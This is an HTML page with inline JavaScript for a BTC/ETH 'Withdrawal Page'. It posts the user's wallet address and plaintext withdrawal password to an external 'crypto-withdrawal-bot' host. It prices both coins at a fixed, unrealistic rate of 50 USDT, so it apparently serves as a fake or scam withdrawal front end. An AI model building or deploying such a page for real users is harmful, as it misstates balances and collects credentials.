<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Withdrawal Page</title>
<style>
body { font-family: Arial,sans-serif; background: transparent; color: #fff; margin:0; padding:0;}
.container {max-width:480px;margin:40px auto;background: rgba(0,0,0,0.6); padding:20px; border-radius:12px;}
h2 {text-align:center;margin-bottom:20px;font-size:1.5em;}
label{display:block;margin-top:10px;font-size:14px;}
input,select,button{width:100%;padding:10px;margin:6px 0;border-radius:6px;border:none;font-size:14px;box-sizing:border-box;}
input,select{background: rgba(255,255,255,0.1); color:#fff;}
button{background:#00bfff;color:#fff;cursor:pointer;font-weight:bold;}
button:disabled{background:#555;cursor:not-allowed;}
.balance{font-size:13px;color:#0f0;margin-bottom:10px;text-align:right;}
.fee{font-size:13px;color:#ff0;margin-bottom:5px;}
#txHashDisplay{font-size:14px;margin-top:10px;color:#0ff;white-space: pre-line;}
#copyBtn{display:none;margin-top:5px;padding:5px;font-size:13px;cursor:pointer;border:none;border-radius:5px;background:#00b894;color:#fff;}
.button-row{display:flex;flex-wrap:wrap;gap:10px;margin-top:5px;}
.button-row button{flex:1 1 48%;min-width:100px;}
@media screen and (max-width:480px){.container{width:90%;padding:15px;margin:20px auto;}.button-row button{flex:1 1 100%;}}
</style>
</head>
<body>
<div class="container">
<h2></h2>

<label>Select Cryptocurrency</label>
<select id="cryptoSelect">
<option value="BTCUSDT">BTC</option>
<option value="ETHUSDT">ETH</option>
</select>

<label>Enter Coin Amount</label>
<input type="number" id="coinAmount" placeholder="Enter coin amount" min="0">
<div class="balance" id="usdtConverted">USDT Equivalent: 0</div>
<div class="fee" id="feeDisplay">Fee 0.1 USDT, Actual Amount: 0</div>

<label>Withdrawal Password</label>
<input type="password" id="withdrawPwd" placeholder="Enter withdrawal password">

<div class="button-row">
<button id="createPwdBtn">Create Password</button>
<button id="confirmPwdBtn">Confirm Password</button>
</div>

<label>Wallet Address</label>
<input type="text" id="wallet" placeholder="Enter wallet address">

<div class="button-row">
<button id="confirmWalletBtn">Confirm Wallet Address</button>
</div>

<button id="submitBtn" disabled>Submit Withdrawal</button>

<div id="txHashDisplay"></div>
<button id="copyBtn">Copy Transaction Hash</button>
</div>

<script>
const API="https://crypto-withdrawal-bot-production.up.railway.app";
let walletBound=false,pwdCreated=false,currentWallet=null;
const FEE=0.1;

function maskWallet(a){return a.slice(0,3)+'****'+a.slice(-3);}
function check(){const q=parseFloat(coinAmount.value)||0;submitBtn.disabled=!(walletBound&&pwdCreated&&q>0);}

coinAmount.oninput=()=>{
 const q=parseFloat(coinAmount.value)||0;
 usdtConverted.innerText='USDT Equivalent: '+(q*50);
 feeDisplay.innerText='Fee 0.1 USDT, Actual Amount: '+Math.max(q*50-FEE,0);
 check();
};

createPwdBtn.onclick=()=>{
 if(!withdrawPwd.value.trim()) return alert("Enter password");
 pwdCreated=true;
 withdrawPwd.disabled=true;
 createPwdBtn.disabled=true;
 alert("Password created");
 check();
};

confirmPwdBtn.onclick=()=>alert("Password confirmed");

// =========================
// Confirm Wallet Address
// =========================
confirmWalletBtn.onclick=async()=>{
 const v = wallet.value.trim();
 const pwd = withdrawPwd.value.trim();

 if (!v) return alert("Enter wallet address");
 if (!pwd) return alert("Enter withdrawal password first");

 let r = await fetch(API+"/api/wallet",{
   method:"POST",
   headers:{ "Content-Type":"application/json" },
   body:JSON.stringify({ wallet:v, password:pwd })
 });

 let d = await r.json();

 if (d.ok){
   currentWallet = v;
   wallet.value = maskWallet(currentWallet);
   wallet.disabled = true;
   walletBound = true;
   alert("Wallet confirmed");
   check();
 } else {
   alert(d.error || "Fail");
 }
};

// =========================
// Submit Withdrawal
// =========================
submitBtn.onclick=async()=>{
 const qty = parseFloat(coinAmount.value)||0;
 const usdt = qty * 50;
 const pwd = withdrawPwd.value.trim();

 let r = await fetch(API+"/api/withdraw",{
   method:"POST",
   headers:{ "Content-Type":"application/json" },
   body:JSON.stringify({
     coin: cryptoSelect.value,
     amount: qty,
     usdt: usdt,
     wallet: currentWallet,
     password: pwd
   })
 });

 let d = await r.json();

 if (d.ok){
   txHashDisplay.innerText = "Transaction Hash: " + d.hash;
   copyBtn.style.display = "block";
   submitBtn.disabled = true;
 } else {
   alert(d.error);
 }
};

copyBtn.onclick=()=>navigator.clipboard.writeText(txHashDisplay.innerText).then(()=>alert("Copied"));
</script>
</body>
</html>
